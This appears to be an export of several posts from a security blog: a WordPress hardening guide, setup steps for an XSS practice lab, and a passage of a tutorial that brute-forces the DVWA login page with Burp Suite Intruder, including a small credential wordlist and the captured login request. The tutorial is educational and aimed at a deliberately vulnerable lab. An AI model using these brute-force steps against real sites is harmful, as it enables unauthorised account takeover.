first thing to do is to ensure that a complete website backup is taken and can be easily restored at any time. This precautionary measure will be helpful in case any unexpected issues arise. Therefore, data integrity should never be compromised.\n🚧 The backup copy should always be placed in a separate location, different from the one where you have hosted your WordPress website.\nIt would be a disaster if you lost the backup copy and all the site contents were tampered with or completely lost in any security attack.\nHaving Scheduled Backup # On-demand backups are a good thing to have. However, having a scheduled backup is still crucial for a website.\nTaking backups at regular intervals can help you restore in case of a security incident or from human mistakes. You can set the frequency based on how much new data is being added to your site.\nYou can adjust the backup intervals from minutes to days based on the criticality of the data. This is one of the important things to check while choosing a hosting provider.\nCheck about how to back up your WordPress site by Syed Balkhi.\nKeeping WordPress core, Themes, and Plugins updated # One of the most essential steps is to keep your site updated with the latest version of WordPress core, theme, and plugins being used.\nOutdated plugins can always pose security risks. From the above stats, we can understand that 94% of the attacks originated from third-party plugins. Keeping the site updated can help you to prevent a lot of attacks. This simple step can mitigate a lot of attacks for you.\nLog into your WordPress site using an admin account and navigate to the \u0026ldquo;Dashboard\u0026rdquo; - \u0026ldquo;Updates\u0026rdquo;.\nOn your updates dashboard, you should be able to see information about which things require updates.\nFigure 3: WordPress Dashboard - Updates Information Currently, our WordPress Core is already updated, and the latest version is present on the server, i.e., Version 6.4.3. The 5 Plugins installed on the above server require updating. The updates can be for many reasons, like new feature releases or bug fixes. You can always click on the \u0026ldquo;View version x.x.x details\u0026rdquo; link, which will take you to the Changelog, where a detailed list of what has been changed and what has been improved. WordPress Core is Automatically updated with security releases. An Admin can see all the available updates.\nThe \u0026ldquo;Updates\u0026rdquo; section of the WordPress dashboard contains information about all the updates needed for your website, such as the WordPress core, plugins, and themes. You can easily update all the necessary plugins.\n❗Points to Remember\nEnsure all your Custom Coded application functionality is free from conflicts. Verify all Plugins, Themes, and Core are compatible with the versions and tech stack you are using. Enable auto-updates for WordPress Plugins and Themes # Navigate to the \u0026ldquo;Plugins\u0026rdquo; section in the dashboard, which will be displayed below.\nFigure 4: WordPress Plugin Updates The \u0026ldquo;Plugins\u0026rdquo; page is where you can manage all your plugins and update them all at once.\nFor any plugins that you think are not very impactful to your website, you can click on the \u0026ldquo;Enable auto-updates\u0026rdquo; button. It will check for the latest updates available daily. If yes, it will automatically update for you.\nThe above option is very helpful.\nDefault themes provided by WordPress are rigorously tested for security vulnerabilities along with the core.\nSimilarly, navigate to \u0026ldquo;Appearance\u0026rdquo; -\u0026gt; \u0026ldquo;Theme\u0026rdquo;, select the theme, and click on \u0026ldquo;Theme Details\u0026rdquo; for the one that you are using.\nFigure 5: WordPress Theme Update You can manually update or just click on the \u0026ldquo;Enable auto-updates\u0026rdquo; link. I hope you\u0026rsquo;re just using the default team directly provided by the vendor without any customization.\nDeactivate Unnecessary or Unused Plugins came default # When we spin up a self-hosted WordPress website, we usually use prebuilt templates provided by the cloud providers or the hosting providers. In any of those cases, WordPress does come with some pre-installed plugins, but some of them might not be useful in most cases. You can just deactivate those plugins or delete them completely if they are not of much help.\nNavigate to the \u0026ldquo;Plugins\u0026rdquo; section in the dashboard, select the \u0026ldquo;Active\u0026rdquo; plugins list, and click on the \u0026ldquo;Deactivate\u0026rdquo; link for all the plugins that are not very useful to you.\nFigure 6: Deactivate Unused WordPress Plugin Even after the plugin is deactivated, the code is still present and using your storage place on the disk. The database entries will be there.\nIf the plugin does not have any important data, you can go ahead and delete it. It will delete all the files and data related to it from the database as well.\nWarning: Avoid the below step if you haven\u0026rsquo;t backed up your data. Backups can help you to restore if needed. If you think the plugin is no longer needed, You can go ahead and delete it completely. Click on the \u0026ldquo;Inactive\u0026rdquo; filter from the \u0026ldquo;Plugins\u0026rdquo; dashboard and click \u0026ldquo;Delete\u0026rdquo;.\nFigure 7: Delete Inactive Plugins The above step is one of the ways in which you can reduce the attack surface for your website. Not only that, but this step can also increase the performance of your website.\nDelete Unused Themes came by default # You can keep the unused theme if you are using it for testing or for other purposes. But I believe there is no point in maintaining a feature that we don\u0026rsquo;t use.\nNavigate to \u0026ldquo;Appearance\u0026rdquo; -\u0026gt; \u0026ldquo;Theme,\u0026rdquo; select the theme, and click on \u0026ldquo;Theme Details\u0026rdquo; for the one that you are using.\nFigure 8: Delete Inactive Theme At the bottom of the Theme Details, you can just click on the \u0026ldquo;Delete\u0026rdquo; button.\nQualities to Check with Your Hosting Provider # The vendor provides the most recent stable version of WordPress Core and the latest version of all underlying tech stack. Providing reliable methods for backup and recovery of your data as and when needed. Ensuring secure communication between the Client and the Server. (Ex:TLS) Transparency in communications in case of any security incidents. Ensuring your site availability. Ability to discuss any of your security concerns with the support team. 🖥️ Website owners must take care of the above in the case of a self-managed site. Use HTTPS Secure Communication Protocol # Ensure your WordPress website is enabled with Transport Layer Security (TLS), i.e., HTTPS enabled. Older versions are referred to as SSL.\nHTTPS runs on port 443 by default. (You can change it to any port.) HTTP runs on port 80 by default. One of the major drawbacks of the HTTP protocol is that anyone on your network can view and monitor all your activity, including sensitive information like usernames, passwords, etc.\nHTTPS prevents attackers from viewing or tampering with Client-Server communication. It transmits and receives all your communications through a secure channel.\nEnsure HTTPS is enabled and that your site only listens to HTTPS communications. To verify, navigate to the WordPress Dashboard \u0026ndash;\u0026gt; Settings \u0026ndash;\u0026gt; General.\nCheck that the WordPress Address (URL) and Site Address (URL) are set with the https prefix as displayed below.\nFigure 9: WordPress Site with HTTPS Configured If you are unable to update it from the portal, you might need to change it accordingly in the wp-config.php configuration file.\nAdditionally, you can go ahead and add a rule in the firewall to disable all communications on HTTP port 80 and redirect all traffic to HTTPS port 443.\nLet\u0026rsquo;s verify our site is accessible over HTTPS and has a valid certificate.\nFigure 10: Verifying the site TLS Certificate Sometimes, the vendor might already have enabled it or provided you with the necessary information to do so. Refer to your vendor documentation for instructions on how to do so.\nUsing WordPress Security Plugins # The built-in options for securing the WordPress site are limited. This is where third-party plugins and SASE-based firewalls come to our rescue. In this section, I will focus only on one WordPress security plugin, which contains more options available and is freely available.\nI will use Wordfence for the examples below. There is no silver bullet in security. You are free to explore other alternative plugins, both free and paid, listed below.\nShield Security Sucuri All-In-One Security Solid Security others Pick one that aligns closely with your requirements. Remember, Trust and reliability are the most important factors when choosing a security plugin. Check out their reviews and support information, too.\nWhy did I choose Wordfence? # A good number of security hardening features are available for free, which can help you quickly start securing your website. Offers malware scanning for free. ❗The malware scanning rules are updated monthly in a free version, and Real-time protection is available in a premium version. It continuously updates the vulnerabilities database. Wordfence Installation # Ensure Wordfence Wordpress plugin is installed and configured. Continue to the next section if you have already installed it.\nAdmin Login: Enable Two-Factor Authentication # The first step is to secure the WordPress site\u0026rsquo;s logging-in mechanism. This will ensure only authorized users are logged into the portal and deny all others by default.\nThis is not limited to the admin user account. It can be enabled for all the user accounts and roles that are critical for your business operations.\nTo get started, Log into the WordPress admin dashboard.\nFigure 11: Wordfence Enable Two-Factor Authentication On the left side of the WordPress admin menu, click on \u0026ldquo;Wordfence\u0026rdquo;. Navigate to \u0026ldquo;Login Security\u0026rdquo;. Wordfence \u0026ldquo;Two-Factor Authentication (2FA)\u0026rdquo; screen will be loaded with instructions for setting up the 2FA. The 2FA provided here is based on a mobile application. You can register with any of the Time-based One-time Password (TOTP) apps, such as Google Authenticator, FreeOTP, Authy. Enter the TOTP code displayed on your Mobile app and verify if it\u0026rsquo;s reflecting correctly and syncing properly with the server., etc. Full list of supported apps can be referred here.\nIn the above screenshot, \u0026ldquo;user\u0026rdquo; is my admin account, and I will enable 2FA for it. Using any one of the TOTP-based apps, scan the code and ensure the entry is added to your 2FA app. After adding an entry, download and save the Recovery Codes in a safe location, which can be used when the TOTP code is unavailable. Enter the TOTP code displayed on your mobile app to verify that it\u0026rsquo;s reflecting correctly and syncing properly with the server. Click on the \u0026ldquo;Activate\u0026rdquo; button to ensure your 2FA is added successfully. I hope you have saved your recovery codes safely. After adding 2FA to your admin account, the next screen will be displayed about your 2FA status.\nFigure 12: Wordfence 2FA Status - Logged-in user Displays information about the Two-Factor Authentication. 2FA status of the currently logged-in user. (i.e., user). Option to deactivate. If your recovery codes are compromised or lost, or if you used all the previous codes, you can generate a new set of recovery codes by clicking on \u0026ldquo;Generate New Codes\u0026rdquo;. Verifying Two-Factor Authentication # Let\u0026rsquo;s go ahead and verify the 2FA which we have newly created. Launch a new incognito window and visit your WordPress admin login page.\nA login window appears, the same as how you used to log in earlier. Just enter the valid admin username and password. Immediately, you will be taken to a 2FA authentication page.\nFigure 13: Wordfence 2FA Verification Enter the code from your mobile app for the wordfence and ensure everything works successfully. This will confirm that you have successfully set up your 2FA authentication for your admin account.\nUpdating 2FA Settings # In the WordPress dashboard, visit \u0026ldquo;Wordfence\u0026rdquo; -\u0026gt; \u0026ldquo;Login Security\u0026rdquo; and click on the \u0026ldquo;Settings\u0026rdquo; tab. Figure 14: Wordfence - 2FA settings You can view the summary of user accounts and update the 2FA policy for your WordPress Portal. I have chosen all the admin accounts that must have 2FA enabled and are optional for other users. Enable 2FA for WooCommerce # If you are using WooCommerce, ensure that the 2FA support is extended to WooCommerce users as well.\nFigure 15: Wordfence - Options for WooCommerce 2FA Enable reCaptcha # In the Wordfence \u0026ldquo;Login Security\u0026rdquo; settings, you can even find the option to enable \u0026ldquo;reCaptcha\u0026rdquo;, which verifies it is a human who is trying to log in or register before submitting.\nFigure 16: Wordfence - Login Settings - reCaptcha This will help you in defending from brute-force attacks.\nEnsure reCaptcha is checked, and make sure to update the Site Key and secret provided from your Google account after registering. You can register for reCaptcha by logging in with your Google account here. This is a threshold, which is like how strictly you want to check whether it\u0026rsquo;s a human or a bot. It\u0026rsquo;s good to start with the default. 1.0 is considered stricter, and 0.0 is the least strict. Please also consider user convenience. Perform strict checks based on the criticality of the data you are dealing with. Verify reCaptcha # Once Google reCaptcha is enabled, you will see the captcha icon at the bottom of the WordPress admin login page and user registration page.\nf\nFrom now on, it will verify and ensure that only humans can fill out and submit the forms on your website.\nFigure 18: Google reCaptha Limits Check 💲 Remember, google reCaptcha has a limit on the number of free assessments that can be done. Beyond the limit, it will be charged monthly.\nUsing the above settings, you can prevent the brute-force attacks on your website.\nStrengthen Wordfence Firewall Settings # Imagine if any of the user accounts on the website used a weak password or a guessable password from a dictionary. It would be easy for attackers to brute-force the password and take over the account.\nThis is one of the common attacks in WordPress, and you might continuously see the BruteForce attempts on your website.\n2FA login security can prevent attacks to an extent, but how about non-2FA login accounts?\nLet\u0026rsquo;s go ahead and tighten the security for those accounts as well.\nEnforce a Strong Password Policy\nIn the WordPress admin dashboard, navigate to \u0026ldquo;Wordfence\u0026rdquo;, and select \u0026ldquo;All Options\u0026rdquo; from the left side menu.\nThe Wordfence \u0026ldquo;All Options\u0026rdquo; page will be loaded as displayed below.\nClick and Expand the \u0026ldquo;Brute Force Protection\u0026rdquo; section.\nEnsure the \u0026ldquo;Brute Force Protection\u0026rdquo; is enabled. Scroll down to the \u0026ldquo;Additional Options\u0026rdquo; section and ensure the \u0026ldquo;Enforce Strong passwords\u0026rdquo; option is checked. Set it to \u0026ldquo;Force all members to use strong passwords\u0026rdquo; from the dropdown menu. Make sure to click on \u0026ldquo;Save Changes\u0026rdquo;. These options would be enabled by default in Wordfence. It\u0026rsquo;s good to verify. Going ahead, Wordfence will ensure that all user accounts are set with strong passwords.\nEnforcing Account Lockout - Limiting Login Attempts\nOn the same page, we can even update the Account Lockout policy settings as well.\nThe Account Lockout settings provided by the default Wordfence are a good limit. You can proceed with it.\nIf your site is receiving a high number of brute force attacks, you can improve the lockout policy, as I have updated it on my website.\nAdditionally, I have selected the option to \u0026ldquo;Prevent the use of passwords from leaked in data breaches\u0026rdquo;, which prevents the admin from using the leaked passwords.\n💡Do not lock yourself out from the WordPress portal.\nWordfence Firewall - IP Whitelist\nTo prevent yourself from locking out from the WordPress portal, it is good to whitelist your IP address.\nClick on Wordfence in the WordPress admin dashboard. Select \u0026ldquo;All Options\u0026rdquo; to list all the Wordfence options available. The application loads the \u0026ldquo;All Options\u0026rdquo; page. Click and Expand \u0026ldquo;Advanced Firewall Options\u0026rdquo;. In the Allowed IP address that bypass all rules, enter your Public IP address. Click on \u0026ldquo;Save Changes\u0026rdquo; to ensure the changes are persistent. Using the above option, you can ensure that you are not locking out yourself. The same option can be used to whitelist the security audits as well.\nEnsure Web Application Firewall Enabled\nUsing a firewall is one way to control what traffic must be allowed and what needs to be blocked from reaching your website. Web Application Firewalls (WAFs) can filter out suspicious traffic coming from the internet.\nThese WAFs are continuously updated with the patterns used by the attackers to compromise the website, which is called as rulesets.\nThis feature is also available in the Wordfence plugin. The free version of the Wordfence plugin will check and stop complex threats.\n🤖It is important to regularly update and review your firewall settings to ensure that your website\u0026rsquo;s security remains strong and up-to-date.\nThe Wordfence dashboard provides you with the information you need about firewall settings and alerts as well.\nLogging into the WordPress admin account, click on the \u0026ldquo;Wordfence\u0026rdquo; plugin on the left side. Click on the \u0026ldquo;Firewall\u0026rdquo; link on the left-side menu. The \u0026ldquo;Wordfence Dashboard\u0026rdquo; will be loaded as displayed in the above screenshot. Click on the \u0026ldquo;Manage Firewall\u0026rdquo; to check out all its settings and options. The firewall options page will be loaded and displayed below.\nFrom the above screenshot, you can understand that the community edition (i.e. the free version) stops the complex attacks, and its ruleset updates are delayed for 30 days compared to premium editions.\nClick and expand the \u0026ldquo;Basic Firewall Options\u0026rdquo; When you set up the \u0026ldquo;Wordfence\u0026rdquo; plugin, it starts with a \u0026ldquo;Learning Mode\u0026rdquo;. In this mode, it tries to understand your plugins and themes' working behaviour, like how they work and what is expected behaviour. Post learning mode, it will automatically switch to \u0026ldquo;Enabled and Protecting\u0026rdquo; mode. You could also change it by clicking on the drop-down menu.\nOn the same page, click-expand on the \u0026ldquo;Advanced Firewall Options\u0026rdquo; and scroll down, you would be able to see firewall rules enabled on your website.\nThese are the rule sets that check for attack patterns for web application vulnerabilities like XSS, SQLI, File upload, XXE, etc.\nIf an attacker tries to exploit your website with an XSS vulnerability, the Firewall\u0026rsquo;s XSS rule is triggered, and that particular attempt is blocked immediately.\nLet\u0026rsquo;s check the Wordfence Firewall in Action. I will just key in with a sample XSS payload, and let\u0026rsquo;s see how it behaves.\nThe above screenshot demonstrates that our firewall is active and blocking the XSS attempts with an HTTP response Forbidden 403 and a custom warning message from the Wordfence plugin.\nIf you have authorized any security professional to carry out the security assessment on your website, whitelist the IP address of authorized professionals and remove it when the assessment is complete.\nI hope the above options can help you get started. At any point, you could opt for a premium service or seek professional assistance when needed.\nAvoid Nulled WordPress Plugins or Themes\nWordPress Nulled plugins or themes are modified versions of premium WordPress plugins distributed for free or at a negligible cost over the Internet through unofficial channels that anyone can download and use.\nIt might seem like a good deal to use without paying, but it does come with a few security risks. To learn more about it, check out the below bookmark.\nhttps://securityarray.io/security-threats-of-nulled-wordpress-plugins-and-themes/\nWordfence Help\nAll the options I have covered above are good for helping you easily get started securing your WordPress website.\nhttps://www.wordfence.com/help/\nUsing Cloudflare Web Application Firewall\nSometimes, the website owner would like to avoid having too many plugins for multiple reasons, such as slowdowns or maintenance reasons.\nIn this case, we could opt for a cloud-based web application firewall like Cloudflare WAF, Amazon WAF, etc. These cloud-based firewalls act as proxies, monitor traffic and filter out all malicious traffic before passing it to our Web Server. Since everything is done on the cloud, your server is not overloaded.\nThese cloud-based firewalls act as the first line of defence and filter out OWASP Top 10 Vulnerabilities, Bot Protection, Block DDOS attacks, and malicious behaviour before allowing traffic to your server. Cloudflare has free and premium plans. The rest are premium services.\nFor the demo, we shall get started using the free option that is available. Before proceeding, I would request you to check the following link, Adding a Site to Cloudflare, and ensure your website is added to Cloudflare.\nLog into your Cloudflare account, navigate to your DNS settings and click on Records.\nIn your DNS records, look out for the one pointing to your WordPress website. In my case it \u0026ldquo;wp.securityarray.io\u0026rdquo;.\nClick \u0026ldquo;Edit\u0026rdquo; on your DNS record. i.e. for wp.securityarray.io Ensure the \u0026ldquo;Proxy Status\u0026rdquo; is enabled and all your incoming traffic is proxied through Cloudflare. Click on the \u0026ldquo;Save\u0026rdquo; button to make the changes. 💡Additionally, Cloudflare also hides your server IP address from the public and has basic WAF protection, CDN capabilities, and DDOS protection enabled for your website.\nThe above configuration will ensure that all our traffic for \u0026ldquo;wp.securityarray.io\u0026rdquo; hits Cloudflare first and then reaches my server.\nWith the above, we have successfully been able to set up the basic WAF protection for our website.\nAs of today, a cheaper option for WordPress users is to use Cloudflare through Cloudways. Cloudways + Cloudflare are integrated and offer premium WAF capabilities at lower cost.\nScan for Vulnerabilities and Malware\nAnother important aspect of WordPress security is to scan your website for any known vulnerabilities and Malware at regular intervals.\nInitially, would recommend installing and getting started with a Jetpack Protect plugin. I\n🔌The Jetpack Protect plugin differs from the Jetpack plugin and is offered separately by the Jetpack team. It is important to note that there is no dependency between the Jetpack Protect plugin and the Jetpack plugin.\nThe next steps would be to evaluate the different security plugins that are available in the market and choose the one that meets your requirements and needs.\nCheck out the bookmark below to learn more about the different ways to scan your WordPress website for vulnerabilities.\nWordPress Scan for Vulnerabilities: A Comprehensive Guide for Site SecurityWordPress scan for vulnerabilities article will guide you with step-by-step approaches and examples that can be implemented on your website to scan and identify vulnerabilities. Also, additional information about security measures, tools, and plugins is available.SecurityArrayRaghunath\nInstall only reputable and trusted plugins. I recommend checking the plugins\u0026rsquo; reviews and support information before choosing one.\nMonitoring and Responding to Security Threats\nA good amount of context is covered in securing the WordPress website. Hardening the WordPress Site is not a one-time effort.\nYou would need to dedicate some time to monitoring it continuously, whether daily, weekly, or monthly, based on the severity of the data you are handling.\n\u0026ldquo;Security is a process, not a product.\u0026rdquo; By: Bruce Schneier\nAdvantages of Monitoring\nHelps to keep your WebSite free from malware You know about the latest threats and keeping the WordPress core and plugins updated. Recognize the breaches early. You could also opt for updates through email notifications. Wordfence Scan\nA good amount of monitoring for security threats can be done with the help of the Wordfence plugin itself.\nIn the WordPress admin dashboard, click and select \u0026ldquo;Wordfence\u0026rdquo; Click on the \u0026ldquo;Scan\u0026rdquo; link. The \u0026ldquo;Scan\u0026rdquo; section will loaded and displayed as shown above. You can start the scan by clicking on the \u0026ldquo;Start New Scan\u0026rdquo; button at any time on demand. It is generally scheduled to run every 24 hours. For more information, click on \u0026ldquo;Scan Options and Scheduling\u0026rdquo;. Wordfence Scan will check for the Server State, File Changes, Malware Scan, Content Safety, Public Files, Password Strength, Vulnerability Scan, and User \u0026amp; Option Audit related files. Additionally, it will display warnings if any are found on your website. Results information will be displayed. Just double-click on the result item or click on the details button on the result. It will provide you with more information.\nFor each result, you can understand the problem and how to address it. If you think any of the result is \u0026ldquo;Fase Positive\u0026rdquo;, you can click on the Ignore button.\nPerforming all the above actions can help you reduce attacks and secure the website to a good extent. You can always seek professional services if additional needs arise.\nTroubleshooting # My Website becomes slow when using Wordfence # This is one of the performance impacts that can be witnessed on some of the WordPress websites. One option is to set \u0026ldquo;Low resource scanning\u0026rdquo;.\nTo do this, Navigate to \u0026ldquo;Wordfence\u0026rdquo; -\u0026gt; \u0026ldquo;Scan\u0026rdquo; -\u0026gt; Scanner Options and Scheduling -\u0026gt; Performance Option -\u0026gt; Ensure \u0026ldquo;Use low resource scanning (reduces server load by lengthening the scan duration)\u0026rdquo; is enabled and check.\nAnother option could be to use premium solutions like Sucuri or check Cloudflare WAF solutions.\nI think my website has been Hacked. # Try using a couple of options, like cleaning and reinstalling all the latest versions of the plugins. Scan with malware analysis plugins like Wordfence, Sucuri, etc. If the issue persists, seek professional assistance.\nConclusion # In conclusion, website security is of utmost importance, especially for WordPress website owners. With the increasing number of cyber threats, it\u0026rsquo;s crucial to take proactive measures to protect your online assets.\nWordfence is a security plugin that is freely available for WordPress and provides a wide range of features to enhance your website\u0026rsquo;s security. Free plugins always come with limitations. It is good to get started, but when demand increases, you might need to opt for premium options with dedicated support.\nBy following the steps outlined in this guide, you can configure Wordfence and its settings to keep your website safe from potential threats such as malware, brute force attacks, and more.\nAdditionally, keep monitoring the WordPress security news and take action accordingly. Don\u0026rsquo;t wait until it\u0026rsquo;s too late \u0026ndash; take the necessary steps to secure your website today.\nAdditional Checklists and References: # WordPress Security JetPack - The Only WordPress Security Checklist The Ultimate WordPress Security Checklist The Ultimate WordPress Security Checklist - Cloudways ","date":"20 March 2024","externalUrl":null,"permalink":"/enhancing-the-security-of-wordpress-sites-best-practices-and-tips/","section":"Posts","summary":"","title":"Enhancing the Security of WordPress Sites: Best Practices and Tips","type":"posts"},{"content":"You would like to learn more about what a cross-site scripting vulnerability is and how it can be exploited with examples. This is the right place for you. I have compiled short lessons on cross-site scripting (XSS) vulnerability with trial testing scenarios close to real-time, which can help you get started with real-world applications.\nLet\u0026rsquo;s start by setting up the lab environment needed for practicing XSS, and upcoming articles will cover the theory and step-by-step approach for identifying the vulnerability.\nKurukshetra- An XSS-vulnerable app by design # In the author\u0026rsquo;s own words, \u0026ldquo;Kurukshetra is a vulnerable lab geared towards practicing XSS challenges.\u0026rdquo;\nThe app\u0026rsquo;s motto is to give you hands-on experience in identifying the XSS vulnerability in different ways and also keep you updated about the theory and basics needed.\nCheck out the GitHub - D4rk36/Kurukshetra for more info.\nAll the content here provided is only for the educational purposes. Authors, Application Creators or Web Site Owners are not responsible for misuse of your knowledge. You are responsible for your own actions!.\nKurukshetra app isn\u0026rsquo;t for production use! Only for testing and learning on a host machine.\nPreparing Environment # A couple of things must be done to start working on the \u0026ldquo;Kurukshetra\u0026rdquo; XSS vulnerable application.\nDocker \u0026amp; Docker Compose must be installed and working A working OS(Linux/Windows/Mac) with network connectivity Git installed Feel free to skip to the next section if all the required tools are pre-installed.\nFor users whose Docker is not installed, please visit the Get Docker page and follow the instructions as specified.\nOnce installed, make sure the Docker is working. The output of the command should be something similar to the below output.\nDocker check: # docker --version Output:\nDocker version 20.10.17, build 100c701 After installing the Docker, you can set up the docker-compose by referring to the given link. It is needed to build up the environment on the go.\nMake sure the docker-compose is working by verifying the version information.\nDocker Compose check: # docker compose version Output:\nDocker Compose version v2.12.2 Hopefully, \u0026ldquo;git\u0026rdquo; is installed on most of them. If you think you don\u0026rsquo;t have one, just go ahead and install it from your package manager or the link given below.\nGit - Download\nLab-Setup - \u0026ldquo;Kurukshetra\u0026rdquo; Application 💻 # Let\u0026rsquo;s clone the application from the GitHub repository and copy it onto your system.\ngit clone https://github.com/D4rk36/Kurukshetra.git Navigate to the downloaded directory.\ncd ./Kurukshetra Inside the directory, you will find a \u0026ldquo;docker-compose.yml\u0026rdquo; file, which contains the instructions for running the application. You have to run \u0026ldquo;docker compose up\u0026rdquo; to bring up the environment.\ndocker compose up Once the environment is up, let\u0026rsquo;s verify by accessing the app environment by clicking on the following URL: http://localhost:8066/ or paste it into your browser.\n💡In case you are facing any errors. Please re-verify all the steps from the docker installation. The page will be displayed below.\nFigure 1: Kurukshetra - XSS Challenges Page Bringing up the Docker instance might take a couple of minutes, based on your network speeds. You should also be able to see the log as displayed below while starting up.\nFigure 2: Kurukshetra Running During any time in the lab, you can run \u0026ldquo;Ctrl - c\u0026rdquo; to stop the running environment.\nAdditionally, to completely remove the \u0026ldquo;Kurukshetra\u0026rdquo; containers running from your system, run the remove command from the same directory where the docker-compose.yml file is present.\ndocker compose rm Now that our lab environment is up and working, you are good to proceed to the next step of identifying the XSS vulnerabilities.\nSummary # The setup is straightforward for users who are familiar with Docker. For other users who are new to docker, you might need to get adapted to using it. Most of the tools are now being containerized to avoid the installation process. Just download and run with docker.\nEnsure your lab environment is working to jump-start learning about cross-site scripting vulnerability. The next articles will cover types of cross-site scripting vulnerabilities and techniques used to identify them. 😃\nAdditional References for XSS Practice: # https://xssy.uk/allLabs ","date":"25 November 2022","externalUrl":null,"permalink":"/xss-explained-learn-cross-site-scripting-with-examples/","section":"Posts","summary":"","title":"XSS Explained - Learn cross-site scripting with examples","type":"posts"},{"content":"Welcome to my corner of the internet, which is dedicated to all things application security, AI, Security Automation, and security awareness! I am happy to have you here.\nSecurityArray is an independent publishing portal that\u0026rsquo;s launched in November 2022 focused on Information Security.\nDisclaimer: Strictly for Educational Purposes Only All the information provided on the site is only for educational purposes. You are responsible for your actions. The WebSite (securityarray.net) or the Author (Raghunath) are not liable for any of your/user actions.\n✉️ Connect with Me # I am available at hello at raghu dot io.\nFeel free to say \u0026ldquo;hi\u0026rdquo; or just drop a line if you have any feedback or suggestions on future content, etc.\n🙏 Look forward to connecting with you soon!\n","date":"14 November 2022","externalUrl":null,"permalink":"/about/","section":"SecurityArray","summary":"","title":"About Me","type":"page"},{"content":"Brute Force is one of the security vulnerabilities which is commonly seen. This article will demonstrate the brute force attack on the Damn Vulnerable Web Application - an intentionally designed vulnerable application. In addition, it will cover how they work, the potential impact, and effective ways to prevent and safeguard your online security.\nThe following post is part of learning application security with the DVWA application.\nBefore jumpstart, ensure the docker DVWA application is enabled, configured, and accessible.\nWhat is a Brute Force Attack? # A brute force attack is a trial-and-error method in which every possible combination of commonly used words, usernames, and passwords is tried out, hoping any of them will work.\nBrute Force attacks are aimed at guessing commonly known files on the web server, breaking into email accounts, guessing remote services SQL or SSH server credentials (online), cracking password hashes (offline), etc., to gain unauthorized access to sensitive data or compromise security.\nIt would require a good amount of computing resources and time. #️⃣\nThe screenshot below from Cloudflare demonstrates how long it can take to crack a password based on the number of characters.\nFigure 1: BruteForce Attack Statistics - Cloudflare Today\u0026rsquo;s hardware helps us crack a hashed password of 5 characters or fewer in seconds. The one with 12 characters or more, combining small letters, upper-case letters, special characters, and numerics, takes years to crack. The bigger the password, the more time it takes to crack using a Brute Force attack.\nThink wisely, how much time you would like to spend for any brute force attack. A day or two may be good, but years and decades may not be worth enough.\nSpeaking on behalf of security assessments, we will be spending days or weeks. But attackers do have all the time they want.\nHow do Brute Force attacks work? # Brute Force attacks are performed using automated tools or software. A massive list of dictionaries containing common passwords, usernames, words, etc., is generated and given to the tool as input.\nThe tool keeps interacting with the service and tries out the dictionary entries one by one until a valid match is found, at which point it stops.\nDuring this process, the attacker uses large dictionary data sets until the correct combination is discovered and successful access to confidential resources is obtained.\nFrom now on, we will use the \u0026ldquo;Burp Suite\u0026rdquo; as an ideal tool for all our brute force attacks and to keep demos focused. If you would like to learn more about the basics and usage of the tool, Check out the following post on BurpSuite Overview.\nNext, I will be using a small custom dictionary of usernames and passwords for fast brute-force results, which will be performed later.\nadmin administrator user john dvwa bob alice root superuser super admin admin123 password password123 user user123 administrator passw0rd r3m3mb3rM3 admin123$ Brute Force Attack - Demo # The DVWA application has a Login page functionality that can be used to brute-force and find the right match of user credentials, simulating the attackers to compromise the application.\nLet\u0026rsquo;s go ahead and simulate the steps of an attacker and see if we can break in.\nIn information security, it\u0026rsquo;s all about chaining up every piece of information you know, experimenting with it, and confirming if it works. In short, it lies in your creativity when using the information.\nFigure 2: DVWA Brute Force - Login Page At the moment, we do not have any information about the username/password. All we see is a login page.\nWe will start with the Brute Force attack using the above dictionaries.\nLet\u0026rsquo;s start the BurpSuite tool and use the small custom dictionaries we created above. The tool tests for all possible combinations, and this method is scalable to thousands of combinations.\nIn the Burp Suite tool, navigate to the \u0026ldquo;Proxy\u0026rdquo; tab and click on the \u0026ldquo;Open Browser\u0026rdquo; button. A Chromium browser will be launched and will be displayed as shown below.\nFigure 3: Burp Suite In-Built Chromium Browser Log into the DVWA application using \u0026ldquo;admin/password\u0026rdquo; and navigate to the \u0026ldquo;Brute Force\u0026rdquo; item in the menu.\nLet\u0026rsquo;s try some known username and password combinations.\nSay \u0026ldquo;administrator/admin123\u0026rdquo;, \u0026ldquo;admin/admin123\u0026rdquo;, \u0026ldquo;user/user123\u0026rdquo; etc. For all incorrect attempts, we keep getting the \u0026ldquo;Username and/or password incorrect.\u0026rdquo; message.\nManually trying out is also known as a simple brute force attack, which is painful and limits the knowledge to oneself. This approach is time-consuming and isn\u0026rsquo;t scalable.\nIf you found a valid login match this approach? Excellent. You perfectly guessed it. 👍\nIn Burp Suite, we need to capture the Login request. I will enable the Intercept option to capture a specific login request so we can perform automated operations using it.\nTo enable it, navigate to Burp Suite \u0026ldquo;Proxy\u0026rdquo; tab ⇾ \u0026ldquo;Intercept\u0026rdquo; ⇾ toggle on the \u0026ldquo;intercept off\u0026rdquo; button. It immediately turns to \u0026ldquo;intercept on\u0026rdquo; as displayed below.\nFigure 4: BurpSuite Intercept \u0026ldquo;Toggle On\u0026rdquo; Key in some random data in the username and password file, then click on the \u0026ldquo;Login\u0026rdquo; button as shown below.\nFigure 5: Key in random credentials on the Login Page Once the Burp Suite receives an intercept request, you should be able to see the highlights immediately. Navigate to the \u0026ldquo;Proxy\u0026rdquo; tab. ⇾ \u0026ldquo;Intercept\u0026rdquo;. You should be able to see a request similar to the one below.\nFigure 6: Brute Force functionality Login Request An HTTP GET method is used, remember the GET method doesn\u0026rsquo;t have a message body. Therefore, all the parameters and values will be sent as a URL.\nGET /vulnerabilities/brute/?username=admin\u0026amp;password=testpassword\u0026amp;Login=Login HTTP/1.1 Here, we are trying to access a page called \u0026ldquo;/vulnerabilities/brute\u0026rdquo; and passing parameter values \u0026ldquo;username=admin\u0026amp;password=testpassword\u0026amp;Login=Login\u0026rdquo; to perform the login action required by the application.\nIf your credentials are valid, you will be able to log in successfully. Otherwise, you will receive an invalid login error message.\nNow, click on the \u0026ldquo;Action\u0026rdquo; button and select \u0026ldquo;Send to Intruder\u0026rdquo;.\nFigure 7: Send to Intruder Switch to the \u0026ldquo;Intruder\u0026rdquo; tab, and you should be able to see the same request there. Under the \u0026ldquo;Positions\u0026rdquo; sub-tab, The tool automatically detects where all the changeable values need to be placed and highlights the five parameter values section for us.\nFigure 8: Request Being Used as Payload I will clear all the payload locations and select only username and password using the \u0026ldquo;Clear\u0026rdquo; and \u0026ldquo;Add\u0026rdquo; buttons beside.\nFigure 9: Select the Positions in a Request to autoamte payloads with dictionaries Types of Brute Force Attacks # There are four 